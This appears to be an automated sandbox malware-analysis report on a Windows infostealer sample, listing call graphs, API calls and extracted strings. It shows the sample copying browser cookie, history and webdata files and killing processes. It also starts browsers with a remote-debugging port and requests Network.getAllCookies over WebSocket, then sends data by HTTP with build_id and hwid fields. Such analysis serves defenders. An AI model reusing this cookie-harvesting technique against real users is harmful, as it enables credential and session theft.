15329->15328 15331 420cfd std::exception::exception 3 API calls 15330->15331 15332 420e0c 15331->15332 15332->15313 15334 412d75 15333->15334 15335 420dfb 4 API calls 15334->15335 15336 412d7f 15335->15336 15338 412b0e 15337->15338 15339 4127fe 15337->15339 15342 412528 8 API calls 15338->15342 15340 412b13 15339->15340 15341 412814 15339->15341 15345 412528 8 API calls 15340->15345 15343 41283d 15341->15343 15344 412b1c 15341->15344 15342->15340 15347 412853 15343->15347 15349 412464 9 API calls 15343->15349 15346 412538 8 API calls 15344->15346 15345->15344 15348 412b21 15346->15348 15350 412893 15347->15350 15351 412866 15347->15351 15349->15347 15352 412908 15350->15352 15355 4128a4 15350->15355 15353 412af1 15351->15353 15362 412976 memmove 15351->15362 15354 4129a0 15352->15354 15360 41291c 15352->15360 15353->15235 15358 4129b2 15354->15358 15359 412a49 15354->15359 15356 4128b8 memmove 15355->15356 15357 4128d7 15355->15357 15356->15357 15357->15353 15369 41298c memcpy 15357->15369 15363 412a93 15358->15363 15364 4129ba 15358->15364 15365 412a5a memmove 15359->15365 15372 412949 15359->15372 15361 412930 memmove 15360->15361 15360->15372 15361->15372 15362->15353 15367 412aa9 memmove 15363->15367 15363->15372 15366 4129f9 15364->15366 15370 4129d3 memmove 15364->15370 15365->15372 15371 412a0a memmove 15366->15371 15366->15372 15367->15372 15368 412ae5 memmove 15368->15353 15369->15353 15370->15366 15371->15372 15372->15353 15372->15368 15374 4123e1 15373->15374 15375 41245c 15373->15375 15377 412432 15374->15377 15378 4123ee 15374->15378 15376 412528 8 API calls 15375->15376 15380 412463 15376->15380 15377->15375 15381 412438 15377->15381 15379 412464 9 API calls 15378->15379 15387 4123f8 15379->15387 15382 4124be 15380->15382 15383 41246e 15380->15383 15395 4124c4 15381->15395 15389 412538 8 API calls 15382->15389 15385 412480 15383->15385 15386 412475 15383->15386 15392 41247e 15385->15392 15394 4122aa 3 API calls 15385->15394 15390 412548 5 API calls 
15386->15390 15388 41241f 15387->15388 15393 412412 memcpy 15387->15393 15388->15248 15391 4124c3 15389->15391 15390->15392 15392->15248 15393->15388 15394->15392 15396 412520 15395->15396 15400 4124d6 15395->15400 15397 412528 8 API calls 15396->15397 15399 412527 15397->15399 15398 412505 15398->15388 15400->15398 15401 4124f4 memmove 15400->15401 15401->15398 15402 4010b0 memset memset 15403 4010f9 lstrcatA 15402->15403 15404 4010e9 15402->15404 15405 40111e lstrcatA 15403->15405 15406 40110e 15403->15406 15404->15403 15407 401143 lstrcatA 15405->15407 15408 401133 15405->15408 15406->15405 15409 401168 lstrcatA 15407->15409 15410 401158 15407->15410 15408->15407 15411 40118d lstrcatA lstrcatA 15409->15411 15412 40117d 15409->15412 15410->15409 15413 4011bc lstrcatA 15411->15413 15414 4011ac 15411->15414 15412->15411 15415 4011e1 lstrcatA 15413->15415 15416 4011d1 15413->15416 15414->15413 15417 401206 lstrcatA 15415->15417 15418 4011f6 15415->15418 15416->15415 15419 40122b lstrcatA 15417->15419 15420 40121b 15417->15420 15418->15417 15421 401250 lstrcatA lstrcatA 15419->15421 15422 401240 15419->15422 15420->15419 15423 401279 lstrcatA 15421->15423 15424 401269 15421->15424 15422->15421 15432 413dbf GetProcessHeap HeapAlloc GetComputerNameA 15423->15432 15424->15423 15426 40128a strcmp 15427 401298 15426->15427 15428 4012ab 15426->15428 15433 413d91 GetProcessHeap HeapAlloc GetUserNameA 15427->15433 15430 40129d strcmp 15430->15428 15431 4012b6 ExitProcess 15430->15431 15432->15426 15433->15430 15442 4022b8 15444 4022d4 15442->15444 15443 413740 lstrcpyA 15443->15444 15444->15443 15446 4023a5 15444->15446 15457 401825 15444->15457 15447 413740 lstrcpyA 15446->15447 15448 4023b9 15447->15448 15449 413740 lstrcpyA 15448->15449 15450 4023c8 15449->15450 15451 413740 lstrcpyA 15450->15451 15452 4023d7 15451->15452 15453 413740 lstrcpyA 15452->15453 15454 4023ed 15453->15454 15522 4014c8 memset 15454->15522 15456 40240a 15458 41370e lstrcpyA 15457->15458 15459 
401842 15458->15459 15460 41370e lstrcpyA 15459->15460 15461 40184e 15460->15461 15475 40189e 15461->15475 15570 414ae0 SHGetFolderPathA 15461->15570 15463 4018b9 15466 413806 2 API calls 15463->15466 15464 40196c 15467 413806 2 API calls 15464->15467 15469 4018cc 15466->15469 15470 40197f 15467->15470 15468 413806 2 API calls 15471 401896 15468->15471 15473 413860 3 API calls 15469->15473 15474 413860 3 API calls 15470->15474 15472 4137c0 lstrcpyA 15471->15472 15472->15475 15476 4018f6 15473->15476 15477 4019aa 15474->15477 15475->15463 15475->15464 15478 413806 2 API calls 15476->15478 15479 413806 2 API calls 15477->15479 15480 401908 15478->15480 15481 4019b9 15479->15481 15484 413860 3 API calls 15480->15484 15482 413860 3 API calls 15481->15482 15483 4019c8 15482->15483 15485 413806 2 API calls 15483->15485 15486 401942 15484->15486 15487 4019da 15485->15487 15488 4137c0 lstrcpyA 15486->15488 15489 4137c0 lstrcpyA 15487->15489 15490 40194e 15488->15490 15489->15490 15491 401a1c FindFirstFileA 15490->15491 15496 402237 15491->15496 15507 401a2f 15491->15507 15492 402207 FindNextFileA 15493 40221d FindClose 15492->15493 15492->15507 15494 40222c 15493->15494 15494->15496 15495 41370e lstrcpyA 15495->15507 15497 413740 lstrcpyA 15497->15507 15498 414ab3 GetFileAttributesA 15498->15507 15499 401b9f FindFirstFileA 15499->15496 15515 401af8 15499->15515 15500 413806 lstrcpyA lstrcatA 15500->15507 15501 413860 lstrlenA lstrcpyA lstrcatA 15501->15507 15502 4137c0 lstrcpyA 15502->15507 15503 414ab3 GetFileAttributesA 15503->15515 15504 401e83 FindNextFileA 15506 401ea1 FindClose 15504->15506 15504->15515 15505 41370e lstrcpyA 15505->15515 15506->15515 15507->15492 15507->15495 15507->15497 15507->15498 15507->15500 15507->15501 15507->15502 15507->15515 15508 4148f3 lstrcpyA lstrcpyA GetSystemTime lstrlenA 15508->15515 15509 413860 lstrlenA lstrcpyA lstrcatA 15509->15515 15510 4137c0 lstrcpyA 15510->15515 15511 4020ee CopyFileA 15513 413740 lstrcpyA 15511->15513 15512 
413806 lstrcpyA lstrcatA 15512->15515 15513->15515 15514 4021cf DeleteFileA 15514->15515 15515->15492 15515->15499 15515->15503 15515->15504 15515->15505 15515->15508 15515->15509 15515->15510 15515->15511 15515->15512 15515->15514 15516 401d7e CopyFileA 15515->15516 15518 40ae6d 6 API calls 15515->15518 15519 401e56 DeleteFileA 15515->15519 15520 413740 lstrcpyA 15515->15520 15521 41797d 116 API calls 15515->15521 15517 413740 lstrcpyA 15516->15517 15517->15515 15518->15515 15519->15515 15520->15515 15521->15515 15523 4014f3 15522->15523 15573 401458 GetProcessHeap HeapAlloc RegOpenKeyExA 15523->15573 15525 40157c lstrcatA lstrlenA 15526 401590 15525->15526 15529 4017fc 15525->15529 15527 41370e lstrcpyA 15526->15527 15528 4015cf 15527->15528 15530 413860 3 API calls 15528->15530 15529->15456 15531 4015e0 15530->15531 15532 413860 3 API calls 15531->15532 15533 40163f 15532->15533 15534 4137c0 lstrcpyA 15533->15534 15535 401648 15534->15535 15536 41370e lstrcpyA 15535->15536 15537 401665 15536->15537 15538 413860 3 API calls 15537->15538 15539 401676 15538->15539 15540 413806 2 API calls 15539->15540 15541 401688 15540->15541 15543 413860 3 API calls 15541->15543 15544 4016b2 15543->15544 15545 4148f3 4 API calls 15544->15545 15546 4016bd 15545->15546 15547 413806 2 API calls 15546->15547 15548 4016c9 15547->15548 15549 4137c0 lstrcpyA 15548->15549 15550 4016d2 15549->15550 15551 401705 CopyFileA 15550->15551 15552 413740 lstrcpyA 15551->15552 15553 401723 15552->15553 15554 40ae6d 6 API calls 15553->15554 15555 401731 15554->15555 15556 4017bd 15555->15556 15557 413740 lstrcpyA 15555->15557 15558 4017d7 DeleteFileA 15556->15558 15559 401759 15557->15559 15566 4017e1 15558->15566 15560 413740 lstrcpyA 15559->15560 15561 401765 15560->15561 15562 413740 lstrcpyA 15561->15562 15563 401771 15562->15563 15564 413740 lstrcpyA 15563->15564 15565 40177c 15564->15565 15567 413740 lstrcpyA 15565->15567 15566->15529 15568 401792 15567->15568 15569 41797d 116 API calls 
15568->15569 15569->15556 15571 41370e lstrcpyA 15570->15571 15572 401884 15571->15572 15572->15468 15574 4014b3 RegCloseKey 15573->15574 15575 40149d RegQueryValueExA 15573->15575 15574->15525 15575->15574
APIs
  • Part of subcall function 004123CA: memcpy.MSVCRT(?,00000010,?,?,?,?,00412388,?,?,?,?,?,?,0041234F,?,00000000), ref: 00412417
• WSAStartup.WS2_32(00000202,?), ref: 00409BFB
• socket.WS2_32(00000002,00000001,00000006), ref: 00409C0B
• getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 00409C67
• closesocket.WS2_32(00000000), ref: 00409C72
• WSACleanup.WS2_32 ref: 00409C78
• htons.WS2_32(00000000), ref: 00409CEB
• freeaddrinfo.WS2_32(?,?,?,?,00000005,00000001), ref: 00409D03
• connect.WS2_32(00000000,?,00000010), ref: 00409D0D
• strlen.MSVCRT ref: 00409DBF
• memmove.MSVCRT(00000000,00000000,?), ref: 00409E5D
• memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 00409EC4
• memmove.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006439EB,00403BD8), ref: 00409F4C
• memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 00409FB3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$CleanupStartupclosesocketconnectfreeaddrinfogetaddrinfohtonsmemcpysocketstrlen
                                                                                                                                                                                                                                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$GET $ws://${"id":1,"method":"Network.getAllCookies"}
                                                                                                                                                                                                                                                  • API String ID: 1979669111-4236195153
                                                                                                                                                                                                                                                  • Opcode ID: 4715123e443adf7437ec88137ba1ca19ecd170733144086bc0f98247ced9646a
                                                                                                                                                                                                                                                  • Instruction ID: 3f74030779492602d4843865c2cca9a124e88548bb3c48b38f5ca924778076b7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4715123e443adf7437ec88137ba1ca19ecd170733144086bc0f98247ced9646a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA72EF706083809FD324DF24C845BABBBE5BF91304F44492EE0D9973D2DBB89949CB5A

Control-flow Graph

[Figure: control-flow graph starting at 40b942; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,0042EEFC,0042EEFC,?,?,00643AFF,?,?,0042EEFC), ref: 0040B9F2
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 0040BF23
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040BF51
                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,?), ref: 0040C281
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C084
                                                                                                                                                                                                                                                    • Part of subcall function 00415071: OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041512A
                                                                                                                                                                                                                                                    • Part of subcall function 00415071: TerminateProcess.KERNEL32(00000000,00000000), ref: 00415139
                                                                                                                                                                                                                                                    • Part of subcall function 00415071: CloseHandle.KERNEL32(00000000), ref: 00415140
                                                                                                                                                                                                                                                    • Part of subcall function 0040B4F3: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B5BB
                                                                                                                                                                                                                                                    • Part of subcall function 0040B4F3: Sleep.KERNEL32(000003E8,?), ref: 0040B5DE
                                                                                                                                                                                                                                                    • Part of subcall function 0040B4F3: PathFileExistsA.SHLWAPI(00000000), ref: 0040B5FC
                                                                                                                                                                                                                                                    • Part of subcall function 0040B4F3: CreateFileA.KERNEL32 ref: 0040B634
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 0040C4D4
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040C4E9
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C5AE
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C6DA
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?), ref: 0040C6F5
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040C70A
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C89C
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 0040C9EE
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040BF66
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,?,?,?,?,00643A71,?,?,0042EEFC), ref: 0040BB57
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Brave,?,?,?,00643A71,?,?,00643A71,?,?,?,?,00643A71,?,?), ref: 0040BCC3
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 0040CC74
                                                                                                                                                                                                                                                    • Part of subcall function 0040B942: StrCmpCA.SHLWAPI(00000000,00632B48), ref: 0040C2AA
                                                                                                                                                                                                                                                    • Part of subcall function 0040B942: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C3AA
                                                                                                                                                                                                                                                    • Part of subcall function 0040B942: Sleep.KERNEL32(000003E8,?), ref: 0040C3CD
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalFree.KERNEL32(EC8350EC), ref: 0040AF18
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040CB1C
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040CB37
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040CB4C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
Similarity
• API ID: File$lstrcat$Copy$lstrcpy$CloseCreateFindSleep$DeleteHandleLocalProcessmemset$AllocExistsFirstFreeNextObjectOpenPathReadSingleSizeTerminateThreadWaitlstrlen
• String ID: --remote-debugging-port=9223 --profile-directory="$Brave$H+c$Opera GX$_cookies.db$_history.db$_webdata.db$q:d$q:d$q:d

APIs
• memmove.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006439EB,00403BD8), ref: 00409F4C
• memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 00409FB3
• memmove.MSVCRT(00000000,00000000,?), ref: 0040A07F
  • Part of subcall function 00412672: memcpy.MSVCRT(00000010,?,?,?,00000000,?,?,?,?,004098B8,?,?,?,?,?), ref: 004126CB
• memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 0040A0F4
• memmove.MSVCRT(00000000,00000000,?,Sec-WebSocket-Version: 13,?,00000000,000000FF), ref: 0040A1B0
• send.WS2_32(00000000,00000000,?,00000000), ref: 0040A256
• recv.WS2_32(00000000,?,00001000,00000000), ref: 0040A275
• rand.MSVCRT ref: 0040A2EA
• rand.MSVCRT ref: 0040A2F3
• rand.MSVCRT ref: 0040A2FC
• rand.MSVCRT ref: 0040A305
• closesocket.WS2_32(00000000), ref: 0040A344
• WSACleanup.WS2_32 ref: 0040A34A
  • Part of subcall function 0041232C: strlen.MSVCRT ref: 0041233A
• send.WS2_32(?,?,?,00000000), ref: 0040A472
Strings
• Sec-WebSocket-Version: 13, xrefs: 0040A184
• Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 0040A03D
• {"id":1,"method":"Network.getAllCookies"}, xrefs: 0040A2E0
Memory Dump Source
• Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memmove$rand$send$Cleanupclosesocketmemcpyrecvstrlen
• String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13${"id":1,"method":"Network.getAllCookies"}

APIs
  • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
  • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
  • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
• FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,?,?,0042EEFC), ref: 0040DE9F
• StrCmpCA.SHLWAPI(00000000,Opera,0042EEFC,0042EEFC,0042EEFC,0042EEFC,0042EEFC,0042EEFC,0042EEFC), ref: 0040DFC0
• StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040DFFB
• StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040E040
  • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
  • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
  • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
  • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
  • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
  • Part of subcall function 00414AB3: GetFileAttributesA.KERNEL32(00000000,?,?,?,00401F5C,?,00000000,?,0042EEFC), ref: 00414AC8
• FindNextFileA.KERNEL32(?,?), ref: 0040E664
  • Part of subcall function 0040D820: FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,0042EEFC), ref: 0040D891
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
                                                                                                                                                                                                                                                  • String ID: Opera$Opera Crypto$Opera GX$\*.*$q:d$q:d$q:d$q:d$q:d$q:d$q:d$q:d
                                                                                                                                                                                                                                                  • API String ID: 3824151033-3007903608
                                                                                                                                                                                                                                                  • Opcode ID: da345ea911fdbb0c6dedb88d97770686dba92db61566b6d7d4b8b57ada552932
                                                                                                                                                                                                                                                  • Instruction ID: 85de566a111d5f1e8b18406dd00569acccaa8dec1bf15e5a141765a1f0173e6d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da345ea911fdbb0c6dedb88d97770686dba92db61566b6d7d4b8b57ada552932
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0432C5B59001189ACF05FF61CC91AEE7B79AF55309F00805EF81567192DF38ABC9CBA8

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 2231 406c70-406d18 call 413740 call 406be0 call 41370e * 5 call 41398e InternetOpenA StrCmpCA 2248 4072fb-407322 InternetCloseHandle call 4147f4 * 2 call 413740 2231->2248 2249 406d1e-406d5e call 4148f3 call 413806 call 4137c0 call 413770 * 2 2231->2249 2260 407327-40737f call 413770 * 9 2248->2260 2271 406d60-406d70 2249->2271 2272 406d77-406d9d call 413860 call 4137c0 call 413770 2249->2272 2271->2272 2286 406dc0-406dfe call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 2272->2286 2287 406d9f-406db9 2272->2287 2306 406e00-406e10 2286->2306 2307 406e17-406ec2 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 413806 call 4137c0 call 413770 * 2 InternetConnectA 2286->2307 2287->2286 2306->2307 2307->2248 2330 406ec8-406efd HttpOpenRequestA 2307->2330 2331 406f03-406f10 2330->2331 2332 4072f4-4072f5 InternetCloseHandle 2330->2332 2333 406f12-406f24 InternetSetOptionA 2331->2333 2334 406f2a-406f34 2331->2334 2332->2248 2333->2334 2335 406f36-406f50 2334->2335 2336 406f57-406f95 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 2334->2336 2335->2336 2349 406f97-406fa7 2336->2349 2350 406fae-406fee call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 2336->2350 2349->2350 2363 406ff0-407001 2350->2363 2364 407008-40702b call 413860 call 4137c0 call 413770 2350->2364 2363->2364 2371 407047-407110 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 2364->2371 2372 40702d-407040 2364->2372 2415 407130-4071c3 call 413860 
call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 41370e call 413806 * 2 call 4137c0 call 413770 * 2 2371->2415 2416 407112-407129 2371->2416 2372->2371 2447 4071c5-407215 call 41398e lstrlenA call 41398e * 2 lstrlenA call 41398e 2415->2447 2416->2415 2457 407272-40728d InternetReadFile 2447->2457 2458 407217-407226 Sleep 2447->2458 2459 4072da-4072f1 InternetCloseHandle call 413770 2457->2459 2460 40728f-407294 2457->2460 2461 407235-40723c 2458->2461 2462 407228-407233 2458->2462 2459->2332 2460->2459 2463 407296 2460->2463 2464 407258-40726d call 41370e call 413770 2461->2464 2465 40723e-407251 2461->2465 2462->2447 2462->2461 2467 407299-4072d1 call 413860 call 4137c0 call 413770 InternetReadFile 2463->2467 2464->2260 2465->2464 2467->2459 2479 4072d3-4072d8 2467->2479 2479->2459 2479->2467
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • InternetOpenA.WININET(?,?,?,?,?), ref: 00406CFD
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?,?,?,?,?), ref: 00406D10
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004072FC
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: lstrlenA.KERNEL32(00000000), ref: 004149BE
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00406EB4
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00406EF2
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00406F24
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042EEFC,?,?,?,?,?,",?,?,build_id), ref: 004071DE
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004071FB
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040721E
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00407285
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 004072C9
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004072DD
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004072F5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$lstrcpylstrlen$CloseHandle$FileOpenReadlstrcat$ConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                  • String ID: "$------$build_id$hwid
                                                                                                                                                                                                                                                  • API String ID: 3613725345-50533134
                                                                                                                                                                                                                                                  • Opcode ID: a226ba48a9e1850e57829bd3354a094638608d2c18dede2ad7c7ec5fa795f12b
                                                                                                                                                                                                                                                  • Instruction ID: 0de5520962e200c6a25ed7e72827b66a405d0f47db110f2e63ec7661919d4967
